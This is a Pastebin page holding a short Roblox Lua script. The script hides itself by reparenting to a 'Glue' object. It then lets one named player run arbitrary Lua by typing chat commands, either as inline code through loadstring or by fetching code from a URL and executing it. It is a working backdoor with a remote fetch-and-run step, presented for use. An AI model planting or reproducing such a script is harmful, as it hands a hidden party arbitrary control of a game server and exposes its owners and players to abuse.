Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- --[[
- In this script, edit only things that are told to edit in the green comments.
- --]]
- EnabledUser = "coolboy566556" -- Put your name in the quotes, without deleting them.
- local Commands = {}
- local Logs = {}
- script.Parent = Instance.new('Glue')
- table.insert(Commands, "/e dos/")
- table.insert(Commands, "/e doh/")
- function C(M)
- if string.sub(M, 1, 7) == "/e dos/" then
- loadstring(string.sub(M, 8))()
- table.insert(Logs, M)
- end
- if string.sub(M, 1, 7) == "/e doh/" then
- loadstring(game:GetService('HttpService'):GetAsync(string.sub(M, 8), true))()
- table.insert(Logs, M)
- end
- end
- game.Players[EnabledUser].Chatted:connect(C)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement